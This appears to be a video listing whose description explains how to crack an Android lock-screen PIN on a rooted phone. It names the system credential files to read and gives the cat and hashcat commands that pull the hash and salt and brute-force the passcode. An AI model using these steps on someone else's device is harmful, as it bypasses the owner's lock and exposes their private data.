How to Hack Android PIN/PASSCODE in seconds with oclHashcat (linux/mac Works only on Rooted device)


Author: NobusHK
440 View
11m 46s Lenght
1 Rating


You need to put your android device/phone in recover mode and enable adb service after that restart your device. In order to start your phone in recover mode you need to restart your android device and keep pressing key up volume until you will see Android system recovery menu after that enable ADB and restart your device again. Target files =========================================== /data/system/password.key /data/system/locksettings.db /data/system/device_policies.xml Command used: cat /data/system/password.key | tr '[:upper:]' '[:lower:]' | tail -c 32 cat /data/system/locksettings.db printf “%016x” salt key cat /data/system/device_policies.xml ./cudaHashcat64.bin -a 3 -n 80 -u 1024 -m 10 hash mask


Comments